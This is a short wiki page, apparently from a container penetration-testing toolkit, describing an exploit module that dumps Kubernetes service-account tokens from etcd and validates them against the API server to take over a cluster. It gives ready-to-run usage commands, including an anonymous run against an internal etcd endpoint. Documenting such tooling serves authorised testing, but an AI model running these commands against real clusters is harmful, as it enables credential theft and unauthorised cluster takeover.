-
Notifications
You must be signed in to change notification settings - Fork 537
Exploit: add etcd get k8s token
neargle edited this page Oct 30, 2023
·
1 revision
List key and value pairs under the /registry/secrets/kube-system/ in etcd service, regular extract plaintext service-account-token, requests the default port 6443 'K8s API-server' service to verify the validity of the token and take over the cluster.
遍历etcd中/registry/secrets/kube-system/前缀下的key、value对,正则提取明文service-account-token,对默认6443端口K8s api-server服务进行请求,验证token有效性,可进一步接管集群。
./cdk run etcd-get-k8s-token (anonymous|default) <endpoint> <cert> <cert_key> <ca>./cdk run etcd-get-k8s-token anonymous http://172.16.61.10:2379
./cdk run etcd-get-k8s-token default